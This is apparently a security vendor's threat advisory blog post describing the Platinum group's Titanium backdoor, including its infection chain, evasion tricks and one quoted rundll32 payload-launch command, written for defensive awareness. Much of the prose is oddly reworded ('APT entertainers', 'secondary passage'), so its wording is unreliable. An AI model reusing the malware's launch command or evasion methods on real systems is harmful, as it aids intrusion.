Threat advisories

Top Middle East Cyber Threat- 26 November 2019

Nov-2019 4 min to read

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.
In this blog, I share the top cybersecurity threat our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:
World’s most notorious hacking group strikes again with new Trojan
Platinum is one of the most technologically progressed APT entertainers with a conventional spotlight on the APAC area. During recent investigations, Kaspersky has found Platinum utilizing another secondary passage that they call Titanium (named after a secret word to one of the self-executable archives). Titanium is the conclusive outcome of an arrangement of dropping, downloading and installing stages. The malware hides at every step by mimicking common software (protection related, sound driver software, DVD video creation tools, etc.).
Platinum, followed as TwoForOne by the analysts, has been active for as far back as ten years penetrating government establishments, resistance organizations, media transmission organizations, and intelligence agencies, explicitly in South and Southeast Asia. As indicated by researchers, Titanium incorporates, “a complex sequence of dropping, downloading and installing stages, with the organization of a Trojan-secondary passage as the last advance”. To sidestep security programming, Titanium utilizes astute tricks like encryption, camouflaging as essential drivers, and delivering information stenographically in PNG pictures. When the trojan has infected a system, it drops its final payload by downloading the necessary records utilizing the Windows Background Intelligent Transfer Service (BITS). The Titanium trojan speaks with the C2 server by utilizing the cURL tool. To commence the server command stream, Titanium sends “a base64-encoded demand that contains a one of a kind System-ID, PC name, and hard disk serial number.” Once the connection is set up, it begins accepting commands.
While Kaspersky researchers have not identified any activity related to Titanium trojan, there are chances it still could be out there since it is difficult to recognize the backdoor owing to its file less technology and encryption techniques. As discovered by Microsoft in 2017, Platinum started using the Intel Active Management Technology (AMT) Serial-over-LAN (SOL) channel for communication thus evading conventional traffic monitoring and filtering solution running compromised devices.
Attack Description
The hacking group employed multiple artifacts during these attacks, with each of them using the following specific distribution sequence:

An exploit capable of executing code as a SYSTEM user
A shellcode to download the next downloader
A downloader to download an SFX archive that contains a Windows task installation script
A password-protected SFX archive with a Trojan-backdoor installer
An installer script (ps1)
A COM object DLL (a loader)
The Trojan-backdoor itself

Platinum apparently uses local intranet websites to deliver the malicious artefacts during the infection process or a shellcode that gets injected into a system process via a yet unknown method according to Kaspersky’s research team.
Shellcode
In this case it was winlogon.exe.
The shellcode’s only purpose is to gain an initial foothold on a target’s machine by downloading encrypted payloads from a command and control server, decrypting them, and launching the next payload in the infection chain.
The shellcode itself contains position-independent code and doesn’t require previously loaded libraries (except Kernel32.dll). Its sole purpose is to connect to the hardcoded C&C address, download an encrypted payload (the password-protected SFX archive), then decrypt and launch it using the hardcoded unpacking password. The usual command line is:
rundll32 $temp\IOZwXLeM023.tmp”,GetVersionInfo -t 06xwsrdrub2i84n6map3li3vz3h9bh4vfgcw”
Wrapper DLLs
Each wrapper is usually a COM DLL, with the corresponding exported functions. The main purpose of these libraries is to decrypt and load an encrypted file (previously dropped somewhere) into the system memory (a payload) and then redirect calls to the wrapper itself to the payload’s exported functions. Another type of wrapper DLL is designed to obtain a command line from its exported function argument passed by a caller and create a new process.
Windows task installer (SFX archive)
This is a password-encrypted SFX archive that can be downloaded via BITS Downloader. The main feature of this archive is that it contains the cURL executable code, compiled into a DLL. Its purpose is to install the Windows task to establish persistence in the infected system.
Trojan-Backdoor installer (SFX archive)
The backdoor itself uses an SFX archive which must be launched from the command line using a password to unpack it.
BITS Downloader
This component is used to download encrypted files from the C&C server then decrypt and launch them.
Who is at risk?
Except if you are running the sort of corporate-grade security arrangement that monitors systems for system-wide behavioural indicators of a focused attack, the odds are that Titanium could make it onto your system without detection. A Kaspersky expert remarks that “the new Titanium APT threat contaminates systems with any modern Windows OS”. Linux and macOS clients are free as Kaspersky says that Titanium just executes on Windows frameworks.
Recommendations
Ensure that good cyber hygiene, as far as clicking links or downloading attachments, is constantly practiced. Additionally, ensure the Windows framework is kept updated, despite the well-promoted issues there have been with Windows updates generally, and the security solution of choice likewise.
REFERENCES